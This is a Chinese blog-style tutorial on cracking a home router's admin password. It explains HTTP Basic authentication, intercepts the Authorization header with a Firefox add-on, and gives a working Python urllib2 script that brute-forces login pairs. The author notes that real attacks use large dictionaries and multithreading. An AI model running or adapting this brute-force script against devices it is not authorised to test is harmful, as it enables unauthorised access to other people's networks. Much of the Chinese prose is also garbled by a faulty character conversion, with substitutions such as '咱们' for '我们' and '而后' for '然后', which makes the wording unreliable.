关于破解路由器密码

http://daily.zhihu.com/story/3603866?utm_campaign=in_app_share&utm_medium=Android

先看看上面的那个文章

------------

Evi1m0大牛破解了路由器的链接密码以后，又破解了路由器的管理登录密码，这个过程就是一笔带过，在这里详细的说一下。

首先说什么是http basic认证

在HTTP协议进行通讯的过程当中，HTTP协议定义了基本认证过程以容许HTTP服务器对WEB浏览器进行用户身份证的方法，当一个客户端向HTTP服务 器进行数据请求时，若是客户端未被认证，则HTTP服务器将经过基本认证过程对客户端的用户名及密码进行验证，以决定用户是否合法。客户端在接收到HTTP服务器的身份认证要求后，会提示用户输入用户名及密码，而后将用户名及密码以BASE64加密，加密后的密文将附加于请求信息中， 如当用户名为anjuta，密码为：123456时，客户端将用户名和密码用“：”合并，并将合并后的字符串用BASE64加密为密文，并于每次请求数据 时，将密文附加于请求头（Request Header）中。HTTP服务器在每次收到请求包后，根据协议取得客户端附加的用户信息（BASE64加密的用户名和密码），解开请求包，对用户名及密码进行验证，若是用 户名及密码正确，则根据客户端请求，返回客户端所须要的数据;不然，返回错误代码或从新要求客户端提供用户名及密码。

咱们先抓包看看http头是什么样的。

我使用的是firefox + tamper data，首先是安装这个插件。

https://addons.mozilla.org/zh-CN/firefox/addon/tamper-data/?src=search

安装以后，按alt，就能显示菜单栏了，工具 -- tamper data，

 

开路由器的登陆网址，个人是http://192.168.1.253 

点击上面的start tamper，而后输入帐号密码，

点击tamper,拦截这个请求，而后能够看到

 

看到Authorization这个了吧，后面跟的明显是base64编码的内容，咱们解码看看

 

这就是咱们的帐号密码中间加一个冒号，而后base64编码。

基本原理明白了，咱们就能够去写程序破解了。

找一个帐号密码字典，而后编码，加到http头，就是这个easy。

#coding:utf-8
import base64
import urllib2
password_dic = [["root", "root"], ["admin", "admin"], ["admin", "rootroot"]]
request = urllib2.Request('http://192.168.1.253')
#request.add_header('Authorization', 'Basic YWRtaW46cm9vdHJvb3Q=')
for item in password_dic:
    psw_base64 = "Basic " + base64.b64encode(item[0] + ":" + item[1])
    request.add_header('Authorization', psw_base64)
    try:
        response = urllib2.urlopen(request)
        print "Correct! Username: %s, password: %s" % (item[0], item[1])
        break
    except urllib2.HTTPError:
        print "Error!"

使用了python自带的urllib2，上面password_dic就是本身随便写的，真正去破解的话，有很大的字典呢，并且多线程去跑。

request.add_header('Authorization', psw_base64)

就将咱们构造的帐号密码的http头加进去了。

看到了吧，最后破解出密码就是admin-rootroot。（你来攻击我啊~）